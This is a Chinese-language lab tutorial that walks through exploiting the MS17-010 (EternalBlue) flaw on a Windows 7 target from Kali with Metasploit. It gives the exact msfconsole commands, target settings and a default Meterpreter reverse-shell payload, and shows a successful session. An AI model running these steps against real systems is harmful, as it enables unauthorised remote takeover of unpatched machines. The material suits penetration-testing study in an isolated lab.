1.准备环境win7操作系统(被攻击机)以及kali系统(攻击机),kali使用msf工具进行攻击。
2.打开kali终端,进入msf,输入msfconsole然后等待启动。
┌──(root㉿kali-chifan)-[~]
└─# msfconsole
3.搜索漏洞远程攻击MS17-010漏洞。
msf6 > search MS17-010
4.搜索到这个漏洞,使用use命令,使用这个漏洞。
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
5.查信息,使用info命令查看相关信息,查看如何使用这个脚本。
msf6 >info
6.根据刚刚查询的信息设置所需参数参数 ,现在是已经进入使用这个漏洞,required提示yes的地方需要设置对应参数。
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.0.101
rhosts => 192.168.0.101
msf6 exploit(windows/smb/ms17_010_eternalblue) > set target 1
target => 1
7.开始运行。发现攻击成功。
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
.......
meterpreter > sysinfo
Computer : ADMIN-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 0
Meterpreter : x64/windows
8.至此结束,写的不算是太详细,但是流程跟我上一篇类似,可以作为参考。可以参考这个漏洞实操MS08-067漏洞攻击远程控制win2003系统详细简单-CSDN博客。如果你也感兴趣可以点个关注支持一下。